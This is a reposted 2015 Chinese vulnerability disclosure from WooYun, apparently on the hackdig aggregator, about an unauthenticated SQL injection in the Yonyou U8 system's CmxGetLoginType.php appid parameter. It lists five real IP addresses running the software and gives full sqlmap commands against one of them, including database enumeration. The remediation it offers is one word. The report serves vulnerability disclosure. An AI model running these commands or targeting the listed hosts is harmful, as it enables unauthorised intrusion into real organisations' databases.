记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

用友优普U8系统高危SQL注入漏洞(无需登录)

2015-10-23 13:50

以前提交的漏洞,其实也不需要登录的,希望处理下,谢谢。

code 区域
 WooYun: 用友优普U8系统一处SQL注射&root权限getshell(需要登陆) 



这次存在漏洞的文件:

code 区域
/Server/CmxGetLoginType.php?a=RAS_admin&appid=1



5个案例:

code 区域
http://218.27.137.242:8080

http://222.177.213.190:8888

http://117.132.15.88:8001

http://221.224.116.210:81

http://221.238.243.237:8000



随机选取一个利用SQLMAP进行测试

code 区域
sqlmap.py -u "http://218.27.137.242:8080/Server/CmxGetLoginType.php?a=RAS_admin&appid=1" -p appid --technique T --dbms mysql



11.png

漏洞证明:

code 区域
sqlmap.py -u "http://218.27.137.242:8080/Server/CmxGetLoginType.php?a=RAS_admin&appid=1" -p appid --technique T --dbms mysql --dbs



22.png

修复方案:

过滤

知识来源: www.wooyun.org/bugs/wooyun-2015-0127402

阅读:238221 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“用友优普U8系统高危SQL注入漏洞(无需登录)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云